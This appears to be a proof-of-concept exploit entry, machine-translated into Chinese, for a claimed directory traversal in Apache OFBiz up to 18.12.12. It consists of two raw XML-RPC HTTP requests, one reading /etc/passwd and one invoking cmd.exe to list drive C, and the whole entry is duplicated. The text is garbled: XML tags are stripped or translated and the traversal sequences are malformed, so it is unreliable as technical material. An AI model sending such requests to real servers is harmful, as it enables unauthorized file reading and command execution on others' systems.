#利用标题: Apache ofBiz 18.12.12-目录遍历
#Google Dork: N/A
#日期: 2024-05-16
#漏洞作者: [abdualhadi khalifa(3https://Twitter.com/absholi_ly)
#供应商homepage: https://ofbiz.apache.org/
##软件link: https://ofbiz.apache.org/download.html
#版本:以下=18.12.12
#测试在: Windows 10
POC。
1-
POST/WEBTOOLS/CONTROL/XMLRPC HTTP/1.1
HOST:脆弱的HOST.com
content-type: text/xml
?XML版本='1.0'?
MethodCall
MethodNameExample.CreateBlogPost/MethodName
参数
参数
valuestring ././././././etc/passwd/string/value
/param
/参数
/MethodCall
或者
2-
POST/WEBTOOLS/CONTROL/XMLRPC HTTP/1.1
HOST:脆弱的HOST.com
content-type: text/xml
?XML版本='1.0'?
MethodCall
MethodNamePerformCommand/MethodName
参数
参数
valuestring ./././././windows/system32/cmd.exe?/c+dir+c: \/string/value
/param
/参数
/MethodCall
#Google Dork: N/A
#日期: 2024-05-16
#漏洞作者: [abdualhadi khalifa(3https://Twitter.com/absholi_ly)
#供应商homepage: https://ofbiz.apache.org/
##软件link: https://ofbiz.apache.org/download.html
#版本:以下=18.12.12
#测试在: Windows 10
POC。
1-
POST/WEBTOOLS/CONTROL/XMLRPC HTTP/1.1
HOST:脆弱的HOST.com
content-type: text/xml
?XML版本='1.0'?
MethodCall
MethodNameExample.CreateBlogPost/MethodName
参数
参数
valuestring ././././././etc/passwd/string/value
/param
/参数
/MethodCall
或者
2-
POST/WEBTOOLS/CONTROL/XMLRPC HTTP/1.1
HOST:脆弱的HOST.com
content-type: text/xml
?XML版本='1.0'?
MethodCall
MethodNamePerformCommand/MethodName
参数
参数
valuestring ./././././windows/system32/cmd.exe?/c+dir+c: \/string/value
/param
/参数
/MethodCall